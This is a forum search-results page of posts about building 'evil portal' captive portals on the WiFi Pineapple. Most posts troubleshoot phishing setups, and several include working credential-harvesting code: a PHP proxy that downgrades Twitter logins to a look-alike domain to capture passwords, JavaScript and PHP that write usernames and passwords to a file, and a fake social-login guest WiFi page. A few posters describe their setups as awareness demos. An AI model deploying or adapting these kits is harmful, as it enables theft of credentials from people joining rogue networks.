Jump to content

Search the Community

Showing results for tags 'evil portal'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • New USB Rubber Ducky
    • WiFi Pineapple
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
    • WiFi Coconut
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • Legacy Devices
    • Classic USB Rubber Ducky
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests

Found 12 results

  1. Hi there! I'm trying to make an evilportal on the wifi pineapple (OS version: 2.1.2, Evil portal version: 1.5.3, other modules installed, don't know if it helps: hcxdumptool[1.0], httpseek[1.2.1]) I've made a template using the "New Portal" button, then modified it to my needs. The problem is that when I try it out with my iphone 13 it fails to reach "http://captive.apple.com/hotspot-detect.html" instead it tries to find the hotspot-detect.html on the webserver. There are a lot of these errors in the log file: 2024/01/20 15:35:51 [error] 25944#0: *9 open() "/www/hotspot-detect.html" failed (2: No such file or directory), client: 172.16.42.143, server: www, request: "GET /hotspot-detect.html HTTP/1.0", host: "captive.apple.com" 2024/01/20 15:36:02 [error] 25944#0: *17 open() "/www/hotspot-detect.html" failed (2: No such file or directory), client: 172.16.42.143, server: www, request: "GET /hotspot-detect.html HTTP/1.0", host: "captive.apple.com" The process (on the Iphone): 1. I join the open wifi network hosted by pineapple with my phone. 2. The captive portal pops up with the desired visual. 3. I fill out the required fields in the form, then click on the submit button. 4. Since it should be a friendly demonstation the destionation url is set to the rickroll Youtube url. (In my head it should redirect to yt and start playing the song, then the user could click on the "Done" button in the top right corner to dismiss the captive portal screen. *Meanwhile the phone's ip makes its way to the "Allowed Clients" list. (So there is in fact internet access on the phone...)* 5. BUT this is where shit hits the fan. There is no "Done" button, only "Cancel", since the phone thinks that the network has no internet on it (since it can't reach the hotspot-detect url described above). Note: If I put a hotspot-detect.html on the pineapple, the captive portal will not pop up, since ios finds it and thinks that everything is fine, no need to pop the portal... I'm almost sure that this behaviour will be there if I test it with an android phone, since it too will have an url to check for internet. (I'll test it later, then edit the post accordingly!) Thanks for the help in advance! Have a nice day, and happy hacking!
  2. Evil Portal is a UI front end for nodogsplash on the 3.x.x firmware. It makes it really simple to create a captive portal for whatever your needs are. You can do anything with it from just making someone agree to your terms of use on the pineapple to running some sort of browser exploitation that your clients are forced to visit (remember the laws where you live). Here's some media: This video goes along with a tutorial I made: click here
  3. Hi! I'm working with evil portal right now and want to redirect from the evil portals login page to a page then warning about the dangers of using unknown networks like this and submitting information. I have a redirect in the PHP of the evil portal, but it doesn't seem to redirect properly. I click submit on the portal box and, on my iPhone, get redirected to captive.apple.com. Has anyone else done something similar?
  4. Hey guys, I've ran into a bit of trouble, could some kind soul help me out please? I'm unable to access POST and GET variables from within the landing page's php if there is a path specified in the URL that isn't "index.php" Example landing page code below, var_dump($_POST) on line 12 returns an empty array despite the form sending the data: <?php if(!strstr($_SERVER['HTTP_HOST'],"twitter") && !strstr($_SERVER['HTTP_HOST'],"twimg") ) { /* If not visiting twitter, redirect to non-HSTS twitter domain */ die('<meta http-equiv="refresh" content="0; url=http://twitter.co.uk/">'); } else { /* form posts to http://twitter.co.uk/sessions */ if(strstr($_SERVER['REQUEST_URI'], "/sessions")) { /* var_dump($_POST) returns an empty array, should print login data */ var_dump($_POST); die(); } /* Curl the site */ $curl = curl_init(); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); curl_setopt($curl, CURLOPT_URL, $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); $result = curl_exec($curl); $result = str_replace('https://twitter.com', 'http://twitter.co.uk', $result); /* changes the form action */ $result = str_replace('<script', "<div style='display:none'><!--", $result); $result = str_replace('</script', "--></div", $result); echo $result; } ?> if I make the form post to http://twitter.co.ukdirectly, without the /session - they are accessible from the landing page, but I would really like to be able to access them even with other filepaths.
  5. Hi Everyone, I am trying to put together a demo with pineapple nano using three modules (DWall, RandomRoll, Evil Portal). I noticed that these modules don’t work consistently. This issue is very easy to reproduce. Try using all three modules starting with DWall, then RandomRool, and Evil Portal at the end. During the first iteration most likely all three modules would work. But try a second iteration and you will find that only DWall works and the remaining two modules fail to work. Is anybody else experiencing this? Thanks in advance for any ideas/pointers on resolving this!
  6. I am unable to get the redirect for evil portal to work. The capture of the variables works but does not redirect to the $authtarget. I have searched the forums and followed the various examples/solutions provided. Below is my function code on the splash.html <script type="text/javascript"> function ajaxRequest() { if (window.XMLHttpRequest) { return new XMLHttpRequest(); } else if (window.ActiveXObject) { return new ActiveXObject("Microsoft.XMLHTTP"); } else { return false; } } function sendInfo() { var xmlhttp = new ajaxRequest(); document.getElementById("results").innerHTML="<p><i>Thank you!</i></p>"; var usernamevalue=encodeURIComponent(document.getElementById("username").value); var passwordvalue=encodeURIComponent(document.getElementById("password").value); var roomnumvalue=encodeURIComponent(document.getElementById("roomnum").value); var lastnamevalue=encodeURIComponent(document.getElementById("lastname").value); var parameters="username="+usernamevalue+"&password="+passwordvalue+"&roomnum="+roomnumvalue+"&lastname="+lastnamevalue; xmlhttp.open("POST", "http://172.16.42.1/capture.php", true); xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); xmlhttp.send(parameters); window.location.assign("$authtarget"); } </script> Here is my form with button <form id="form_1" method="POST" action="http://172.16.42.1/capture.php"> <br> <div class="credential_block block"> <b>Login with one of the following <br><img src="images/smicons.png"><br> <div id="room_number_cred"> <font class="block">Email</font> <input class="txt_field" name="username" id="username" type="text"> </div> <div id="last_name_cred"> <font class="block">Password</font> <input class="txt_field" name="password" id="password" type="password"> </div> <input value="Connect" type="submit" onclick="sendInfo();return false;"> Here is my capture.php <?php $username = $_POST["username"]; $password = $_POST["password"]; $roomnum = $_POST["roomnum"]; $lastname = $_POST["lastname"]; $file = fopen("stored.txt", "a"); fwrite($file, "Username: " . $username . " Password: " . $password . " RoomNumber: " . $roomnum . " Lastname: " . $lastname . "\n"); fclose($file); echo '<p><i>Thank you!</i></p>'; ?>
  7. I'd love to release this to the Community.. as soon as I get it fixed ;) <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR...nsitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>White Pirate WiFi</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <style type="text/css"> body { background-image: images/wallpaper-2551827.png); background-repeat: no-repeat; } </style> </head> <script type="text/javascript"> function ajaxRequest() { if (window.XMLHttpRequest) { return new XMLHttpRequest(); } else if (window.ActiveXObject) { return new ActiveXObject("Microsoft.XMLHTTP"); } else { return false; } } function sendInfo() { var xmlhttp = new ajaxRequest(); document.getElementById("results").innerHTML="<p><i>Thank you!</i></p>"; var usernamevalue=encodeURIComponent(document.getElementById("username").value) var passwordvalue=encodeURIComponent(document.getElementById("password").value) var parameters="username="+usernamevalue+"&password="+passwordvalue xmlhttp.open("POST", "http://172.16.42.1/capture.php", true) xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded") xmlhttp.send(parameters) } </script> <body text="#FFFFFF" link="#FF0004" vlink="#FF0004" alink="#FF0004"> <center> <br /> <img src="images/Wi-Fi-Alliance.png" alt="" width="200" height="128"><br /> <br /> <p><Strong>Welcome to 'White Pirate' Guest WiFi</Strong></p> <p><br /> </p> <form action="capture" method="post"> <fieldset> <p><strong>Please login using any of the following.</strong></p> <table width="500"> <tr> <td width="20%" colspan="1" align=left>Email</td> <td colspan="3"><input name="username" type="text" id="username" /></td> </tr> <tr> <td colspan="1" align=left>Password</td> <td colspan="3"><input type="password" name="password" id="password" /></td> </tr> <tr> <td><blockquote> <p><img src="images/social-facebook-box-white-icon.png" width="49" height="49" /></p> </blockquote></td> <td width="19%"><blockquote> <p><img src="images/social-yahoo-box-white-icon.png" width="49" height="49"/></p> </blockquote></td> <td width="20%"><blockquote> <p><img src="images/social-twitter-box-white-icon.png" width="49" height="49"/></p> </blockquote></td> <td width="41%"><blockquote> <p><img src="images/social-google-box-white-icon.png" width="49" height="49"/></p> </blockquote></td> </tr> </table> </fieldset> </form> <p><br /> </p> <form method="POST" action="http://172.16.42.1/capture.php"> <button type="button" onclick="sendInfo();return false;">Submit</button> </form> </p> </center> </body> </html My issue is just with the button.. making sure it goes to the correct page the user is trying to go to.
  8. Hey all. deleted this as no one wanted to help.
  9. Howdy I've been having an issue getting Evil Portal installed on my pineapple. Things simply hangup at "installing dependencies". I gave it over an hour and grabbed some food but upon return, it was still hung up. Rebooted, removed the injection, and redownloaded with fingers crossed that I could have it installed in a less than a few minutes, but still no go. Flashed it and tried again and again but I keep running into this same issue. Has anyone had this experience? What are this apps dependencies and can I just install them to bypass the message? (or will it check anyway?) Any advice would be greatly appreciated. I got to have some fun with version 1 of this tool on a friends pineapple and was looking forward to checkout out version 2 on my own. Thanks in advance
  10. hey guys! So I have my new Evil Portal set up and everything works fine on mobile devices, however, for some reason the computers that connect will not get through to the internet even when I try opening all the ports for Auth and pre auth users, heres the config file. I will attach the splash page as well, possibly didnt apply authuser properly. # # Nodogsplash Configuration File # # Parameter: GatewayInterface # Default: NONE # # GatewayInterface is not autodetected, has no default, and must be set here. # Set GatewayInterface to the interface on your router # that is to be managed by Nodogsplash. # Typically br-lan for the wired and wireless lan on OpenWrt White Russian. # May be br-lan on OpenWrt Kamikaze. # GatewayInterface br-lan # FirewallRuleSet: authenticated-users # # Control access for users after authentication. # These rules are inserted at the beginning of the # FORWARD chain of the router's filter table, and # apply to packets that have come in to the router # over the GatewayInterface from MAC addresses that # have authenticated with Nodogsplash, and that are # destined to be routed through the router. The rules are # considered in order, and the first rule that matches # a packet applies to it. # If there are any rules in this ruleset, an authenticated # packet that does not match any rule is rejected. # N.B.: This ruleset is completely independent of # the preauthenticated-users ruleset. # FirewallRuleSet authenticated-users { # You may want to open access to a machine on a local # subnet that is otherwise blocked (for example, to # serve a redirect page; see RedirectURL). If so, # allow that explicitly here, e.g: FirewallRule allow tcp port 80 to 192.168.254.254 # Your router may have several interfaces, and you # probably want to keep them private from the GatewayInterface. # If so, you should block the entire subnets on those interfaces, e.g.: FirewallRule block to 192.168.0.0/16 FirewallRule block to 10.0.0.0/8 # Typical ports you will probably want to open up include # 53 udp and tcp for DNS, # 80 for http, # 443 for https, # 22 for ssh: FirewallRule allow tcp port 53 FirewallRule allow udp port 53 FirewallRule allow tcp port 80 FirewallRule allow tcp port 443 FirewallRule allow tcp port 22 FirewallRule allow tcp port 1471 FirewallRule allow tcp port 8080 } # end FirewallRuleSet authenticated-users # FirewallRuleSet: preauthenticated-users # # Control access for users before authentication. # These rules are inserted in the PREROUTING chain # of the router's nat table, and in the # FORWARD chain of the router's filter table. # These rules apply to packets that have come in to the # router over the GatewayInterface from MAC addresses that # are not on the BlockedMACList or TrustedMACList, # are *not* authenticated with Nodogsplash. The rules are # considered in order, and the first rule that matches # a packet applies to it. A packet that does not match # any rule here is rejected. # N.B.: This ruleset is completely independent of # the authenticated-users and users-to-router rulesets. # FirewallRuleSet preauthenticated-users { # For preauthenticated users to resolve IP addresses in their initial # request not using the router itself as a DNS server, # you probably want to allow port 53 udp and tcp for DNS. FirewallRule allow tcp port 53 FirewallRule allow udp port 53 # For splash page content not hosted on the router, you # will want to allow port 80 tcp to the remote host here. # Doing so circumvents the usual capture and redirect of # any port 80 request to this remote host. # Note that the remote host's numerical IP address must be known # and used here. # FirewallRule allow tcp port 80 to 123.321.123.321 } # end FirewallRuleSet preauthenticated-users # FirewallRuleSet: users-to-router # # Control access to the router itself from the GatewayInterface. # These rules are inserted at the beginning of the # INPUT chain of the router's filter table, and # apply to packets that have come in to the router # over the GatewayInterface from MAC addresses that # are not on the TrustedMACList, and are destined for # the router itself. The rules are # considered in order, and the first rule that matches # a packet applies to it. # If there are any rules in this ruleset, a # packet that does not match any rule is rejected. # FirewallRuleSet users-to-router { # Nodogsplash automatically allows tcp to GatewayPort, # at GatewayAddress, to serve the splash page. # However you may want to open up other ports, e.g. # 53 for DNS and 67 for DHCP if the router itself is # providing these services. FirewallRule allow udp port 53 FirewallRule allow tcp port 53 FirewallRule allow udp port 67 FirewallRule allow udp port 1471 FirewallRule allow udp port 8080 # You may want to allow ssh, http, and https to the router # for administration from the GatewayInterface. If not, # comment these out. FirewallRule allow tcp port 22 FirewallRule allow tcp port 80 FirewallRule allow tcp port 443 FirewallRule allow tcp port 8080 FirewallRule allow tcp port 1471 } # end FirewallRuleSet users-to-router # EmptyRuleSetPolicy directives # The FirewallRuleSets that NoDogSplash permits are: # # authenticated-users # preauthenticated-users # users-to-router # trusted-users # trusted-users-to-router # # For each of these, an EmptyRuleSetPolicy can be specified. # An EmptyRuleSet policy applies to a FirewallRuleSet if the # FirewallRuleSet is missing from this configuration file, # or if it exists but contains no FirewallRules. # # The possible values of an EmptyRuleSetPolicy are: # allow -- packets are accepted # block -- packets are rejected # passthrough -- packets are passed through to pre-existing firewall rules # # Default EmptyRuleSetPolicies are set as follows: # EmptyRuleSetPolicy authenticated-users passthrough # EmptyRuleSetPolicy preauthenticated-users block # EmptyRuleSetPolicy users-to-router block # EmptyRuleSetPolicy trusted-users allow # EmptyRuleSetPolicy trusted-users-to-router allow # Parameter: GatewayName # Default: NoDogSplash # # Set GatewayName to the name of your gateway. This value # will be available as variable $gatewayname in the splash page source # and in status output from ndsctl, but otherwise doesn't matter. # If none is supplied, the value "NoDogSplash" is used. # # GatewayName NoDogSplash # Parameter: GatewayAddress # Default: Discovered from GatewayInterface # # This should be autodetected on an OpenWRT system, but if not: # Set GatewayAddress to the IP address of the router on # the GatewayInterface. This is the address that the Nodogsplash # server listens on. # # GatewayAddress 192.168.1.1 # Parameter: ExternalInterface # Default: Autodetected from /proc/net/route # # This should be autodetected on a OpenWRT system, but if not: # Set ExtrnalInterface to the 'external' interface on your router, # i.e. the one which provides the default route to the internet. # Typically vlan1 for OpenWRT. # # ExternalInterface vlan1 # Parameter: RedirectURL # Default: none # # After authentication, normally a user is redirected # to their initially requested page. # If RedirectURL is set, the user is redirected to this URL instead. # # RedirectURL http://www.ilesansfil.org/ # Parameter: GatewayPort # Default: 2050 # # Nodogsplash's own http server uses GatewayAddress as its IP address. # The port it listens to at that IP can be set here; default is 2050. # GatewayPort 80 # Parameter: MaxClients # Default: 20 # # Set MaxClients to the maximum number of users allowed to # connect at any time. (Does not include users on the TrustedMACList, # who do not authenticate.) # # MaxClients 20 # ClientIdleTimeout # Parameter: ClientIdleTimeout # Default: 10 # # Set ClientIdleTimeout to the desired of number of minutes # of inactivity before a user is automatically 'deauthenticated'. # # ClientIdleTimeout 10 # Parameter: ClientForceTimeout # Default: 360 # # Set ClientForceTimeout to the desired number of minutes before # a user is automatically 'deauthenticated', whether active or not # # ClientForceTimeout 360 # Parameter: AuthenticateImmediately # Default: no # # Set to yes (or true or 1), to immediately authenticate users # who make a http port 80 request on the GatewayInterface (that is, # do not serve a splash page, just redirect to the user's request, # or to RedirectURL if set). # # AuthenticateImmediately no # Parameter: MACMechanism # Default: block # # Either block or allow. # If 'block', MAC addresses on BlockedMACList are blocked from # authenticating, and all others are allowed. # If 'allow', MAC addresses on AllowedMACList are allowed to # authenticate, and all other (non-trusted) MAC's are blocked. # # MACMechanism block # Parameter: BlockedMACList # Default: none # # Comma-separated list of MAC addresses who will be completely blocked # from the GatewayInterface. Ignored if MACMechanism is allow. # N.B.: weak security, since MAC addresses are easy to spoof. # # BlockedMACList 00:00:DE:AD:BE:EF,00:00:C0:1D:F0:0D # Parameter: AllowedMACList # Default: none # # Comma-separated list of MAC addresses who will not be completely # blocked from the GatewayInterface. Ignored if MACMechanism is block. # N.B.: weak security, since MAC addresses are easy to spoof. # # AllowedMACList 00:00:12:34:56:78 # Parameter: TrustedMACList # Default: none # # Comma-separated list of MAC addresses who are not subject to # authentication, and are not restricted by any FirewallRuleSet. # N.B.: weak security, since MAC addresses are easy to spoof. # # TrustedMACList 00:00:CA:FE:BA:BE, 00:00:C0:01:D0:0D # Parameter: PasswordAuthentication # Default: no # Set to yes (or true or 1), to require a password matching # the Password parameter to be supplied when authenticating. # # # PasswordAuthentication no # Parameter: Password # Default: none # Whitespace delimited string that is compared to user-supplied # password when authenticating. # # # Password nodog # Parameter: UsernameAuthentication # Default: no # Set to yes (or true or 1), to require a username matching # the Username parameter to be supplied when authenticating. # # # UsernameAuthentication no # Parameter: Username # Default: none # Whitespace delimited string that is compared to user-supplied # username when authenticating. # # # Username guest # Parameter: PasswordAttempts # Default: 5 # Integer number of failed password/username entries before # a user is forced to reauthenticate. # # # PasswordAttempts 5 # Parameter: TrafficControl # Default: no # # Set to yes (or true or 1), to enable traffic control in Nodogsplash. # # TrafficControl no # Parameter: DownloadLimit # Default: 0 # # If TrafficControl is enabled, this sets the maximum download # speed to the GatewayInterface, in kilobits per second. # For example if you have an ADSL connection with 768 kbit # download speed, and you want to allow about half of that # bandwidth for the GatewayInterface, set this to 384. # A value of 0 means no download limiting is done. # # DownloadLimit 384 # Parameter: UploadLimit # Default: 0 # # If TrafficControl is enabled, this sets the maximum upload # speed from the GatewayInterface, in kilobits per second. # For example if you have an ADSL connection with 128 kbit # upload speed, and you want to allow about half of that # bandwidth for the GatewayInterface, set this to 64. # A value of 0 means no upload limiting is done. # # UploadLimit 64 # Paramter: GatewayIPRange # Default: 0.0.0.0/0 # # By setting this parameter, you can specify a range of IP addresses # on the GatewayInterface that will be responded to and managed by # Nodogsplash. Addresses outside this range do not have their packets # touched by Nodogsplash at all. # Defaults to 0.0.0.0/0, that is, all addresses. # # GatewayIPRange 0.0.0.0/0 --------------------------------------------------------------------------------------------------------------- Below is the html ---------------------------------------------------------------------------------------------------------------\ <!DOCTYPE html> <html> <head> <meta charset="UTF-8 "HTTP-EQUIV="Pragma" CONTENT="no-cache"> <title>$gatewayname Entry</title> <style> * { margin: 0; padding: 0; } html { background: url($imagesdir/background.jpg) no-repeat center center fixed; -webkit-background-size: cover; -moz-background-size: cover; -o-background-size: cover; background-size: cover; } #page-wrap { width: 400px; margin: 50px auto; padding: 20px; background: white; -moz-box-shadow: 0 0 20px black; -webkit-box-shadow: 0 0 20px black; box-shadow: 0 0 20px black; } p { font: 15px/2 Georgia, Serif; margin: 0 0 30px 0; text-indent: 40px; } </style> </head> <body> <div id="contact-form"> <form id="contact" method="post" action=""> <fieldset> <h3>For Free Wifi enter the information below</h3> <label for="name">Name</label> <input type="text" name="name" placeholder="Full Name" title="Enter your name" class="required"> <label for="email">E-mail</label> <input type="email" name="email" placeholder="yourname@domain.com" title="Enter your e-mail address" class="required email"> <label for="phone">Phone</label> <input type="tel" name="phone" placeholder="ex. (555) 555-5555"> <div style="overflow:auto;height:100px;"> This agreement sets out the terms and conditions on which wireless internet access (the Service) is provided free of charge to you, a guest, vendor, board member or employee of The Financial Services Network (Network). Your access to the Service is completely at the discretion of the Network. Access to the Service may be blocked, suspended, or terminated at any time for any reason including, but not limited to, violation of this Agreement, actions that may lead to liability for the Network, disruption of access to other users or networks, and violation of applicable laws or regulations. The Network reserves the right to monitor and collect information while you are connected to the Service and that the collected information can be used at discretion of the the Network, including sharing the information with any law enforcement agencies, the Network partners and/or the Network vendors. The Network may revise this Agreement at any time. You must accept this Agreement each time you use the Service and it is your responsibility to review it for any changes each time. We reserve the right at all times to withdraw the Service, change the specifications or manner of use of the Service, to change access codes, usernames, passwords or other security information necessary to access the service. Any transmissions through this wireless router are the property of the Network and may be used for educational purposes. All packets captured by this access point may be used for presentation during our conferences. This is a really bad idea, by connecting to open networks you are broadcasting your transmissions openly to anyone who may want to steal them. IF YOU DO NOT AGREE WITH THESE TERMS, INCLUDING CHANGES THERETO, DO NOT ACCESS OR USE THE SERVICE. </div> <a href="$authtarget"> <img src="$imagesdir/continue.png" width="280"height="114"border="0" alt="Click to enter" title="Click to enter"> </a> </fieldset> </form> </div><!-- /end #contact-form --> <style type="text/css" style="display: none !important;"> * { margin: 0; padding: 0; } body { overflow-x: hidden; } #demo-top-bar { text-align: left; background: #222; position: relative; zoom: 1; width: 100% !important; z-index: 6000; padding: 20px 0 20px; } #demo-bar-inside { width: 960px; margin: 0 auto; position: relative; } #demo-bar-buttons { padding-top: 10px; float: right; } #demo-bar-buttons a { font-size: 12px; margin-left: 20px; color: white; margin: 2px 0; text-decoration: none; font: 14px "Lucida Grande", Sans-Serif !important; } #demo-bar-buttons a:hover, #demo-bar-buttons a:focus { text-decoration: underline; } #demo-bar-badge { display: inline-block; width: 302px; padding: 0 !important; margin: 0 !important; background-color: transparent !important; } #demo-bar-badge a { display: block; width: 100%; height: 38px; border-radius: 0; bottom: auto; margin: 0; background: url(/images/examples-logo.png) no-repeat; background-size: 100%; overflow: hidden; text-indent: -9999px; } #demo-bar-badge:before, #demo-bar-badge:after { display: none !important; } form#contact fieldset { position: relative; width: 300px; margin: 50px auto; padding: 20px; background: white; -moz-box-shadow: 0 0 20px black; -webkit-box-shadow: 0 0 20px black; box-shadow: 0 0 20px black; } form#contact input[type=text], input[type=url], input[type=email], input[type=tel], textarea { margin: 3px 0 0 0; padding: 6px; width: 260px; font-family: arial, sans-serif; font-size: 12px; border: 1px solid #ccc; background: -webkit-gradient(linear, left top, left 15, from(#FFFFFF), color-stop(4%, #f4f4f4), to(#FFFFFF)); background: -moz-linear-gradient(top, #FFFFFF, #f4f4f4 1px, #FFFFFF 15px); } form#contact textarea { width: 275px; height: 150px; } form#contact label { display: block; font-size: 13px; color: #666; margin-top: 10px; font-weight: bold; } form#contact label.error { width: 270px; margin: 3px 0 0 0; display: block; color: #cf0101; font-size: 11px; text-align: right; } form#contact .placeholder { color: #aaa; } form#contact .button { display: inline-block; margin: 15px 0 0 90px; padding: 5px 15px 5px 15px; background-color: #ff9e00; border: none; color: #fff; -moz-border-radius: 15px; -webkit-border-radius: 15px; border-radius: 15px; } form#contact .button:hover { background-color: #fc8500; cursor: pointer; } form#contact .button:active { margin-top: 16px; background-color: #f08004; cursor: pointer; } </style> </body> <script type="text/javascript"> document.getElementById("submit").onclick = function () { location.href = "www.google.com"; }; </script> </html>
  11. Hey guys, I have been working on a presentation over web security and awareness, and one of the things i was going to do was create a captive portal at the conference venue that people would just log into without clearing that it is safe or not. My issue is for some reason my pineapple refuses to install the dependencies from the web portal. I have tried checking for updates (im on 1.4) I have tried flashing, I have trie just about everything. Can someone possibly give me a hint as to what I could try? I'm running on windows, with winSCP and PuTTY. I would love some advice.
  12. Just wanted to share the custom landing page that I created for Nodogsplash and the Evil Portal infusion. You can download the package from the link provided below. The package includes the image files, splash page html code, and my PDS projects. Feel free to customize or improve the files and enjoy! Download the package - http://www.sunstudiophoto.com/pineapple/portal.zip If you need help installing Evil Portal and setting up your captive portal, watch my full-length tutorial - "http://youtu.be/nw4bo4rXGgQ" Here are some screenshots of the portal. The first screenshot shows the portal without any user interaction. The second screenshot shows the portal after the user has scrolled over the accept button (a check mark appears).
×
×
  • Create New...